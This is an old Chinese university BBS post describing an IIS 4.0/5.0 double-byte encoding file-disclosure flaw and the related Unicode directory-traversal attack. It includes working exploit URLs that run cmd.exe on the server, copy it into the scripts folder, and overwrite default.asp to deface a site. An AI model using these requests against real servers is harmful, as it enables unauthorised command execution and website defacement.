荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: Secret (★ 别问我是谁 ★), 信区: Microsoft
标 题: Windows 2000漏洞集锦(四)
发信站: 荔园晨风BBS站 (Sun Jul 22 10:30:27 2001), 转信
IIS服务泄漏文件内容
这是一个NSFOCUS安全小组发现的漏洞。当微软IIS 4.0/5.0(远东地区版本)在
处理包含有不完整的双字节编码字符的HTTP命令请求时,会导致WEB目录下的文件
内容被泄漏给远程攻击者。
Microsoft IIS远东地区版本包括中文(简体/繁体),日文,韩文版,由于特定
的文字格式使它们都是使用的双字节编码格式。而当IIS接收到用户提交的一个
HTTP请求时,如果文件名中包含非ASCII字符,IIS会检查这个字符是否为双字节编
码中的前导字符(例如,日文的前导字符包含两段字符:0x81-0x9F, 0xE0-0xFC)。
如果是前导字符,它会继续检查下一个字符是否为结尾字符。如果没有下一个字符
,IIS会简单地丢弃这个前导字符,因为它并没有构成一个完整的双字节编码。然
而,这种处理将导致IIS打开不同的文件而不是用户在请求中指定的文件。
攻击者通过提交一个特殊格式的URL, 可以使IIS使用某个ISAPI动态链接库打
开某种它所不能解释的类型的文件,并获得该文件的内容。依赖于系统安装的
ISAPI应用程序的类型,攻击者可能获得WEB根目录或者虚拟目录下的文件内容,这
些文件可以是普通文本文件(.asp, .ini, .asa等等),也可以是二进制文件(.exe
等等)。
黑客们会使用Unicode的方法利用这个漏洞:
Unicode(统一的字符编码标准, 采用双字节对字符进行编码)可以说是近一
段时期以来最为流行的攻击入侵手段,仅国内近期就有江民公司等几个大的网站被
这种入侵手段攻击。那我们就来谈一下这个很容易的利用Unicode漏洞配合IIS的漏
洞进行入侵吧。
上面我们提到过由于某些双字节的Windows2000在处理某些特殊字符时与英文
版本不同,然而利用这种IIS的漏洞,攻击者就可以通过这些特殊字符绕过IIS的目
录审计远程执行任意命令。
http://server/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
黑客们其实只要下面两句很简单的指令绕过IIS的审计就能够对网站的页面进
行改写,所谓的黑了一个网站就是这么的简单。
http://server/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:
\winnt\system32\cmd.exe+d:\inetpub\scripts\123.exe
http://server/scripts/123.exe?/c+echo+黑掉啦?+>+c:
\inetpub\wwwroot\default.asp
这个问题已经在IIS 4.0 + SP6中得到解决,然而微软却让它在IIS 5.0中再度
出现。
但该漏洞不会影响包括英语版在内的其他语言版本的IIS 4.0/5.0。
--
▁▃▅▇▇▅▃▁ ┌────╭───★ 别问我是谁 ★──────╮
╭┼╮ ▌ ╭┼╮ │█◤◥█ ▂ ▂ ▂ ▂ ▂ ▂ │
╱ │ ╲ ▌ ╱ │ ╲│◣▃▃ ◤ ◥ ◤ ◥ █◢ ◥ ◤ ◥ ▅▇▅│
◥天称◤ ▌ ◥男孩◤│ ◥ ◣━◢ ▌ █◤ ◣━◢ ▇ │
◢██◣ │█◣◢█ ◣____ ◣▂◢ █ ◣____ ◣__│
└──────────────────────┘
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.39.110]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店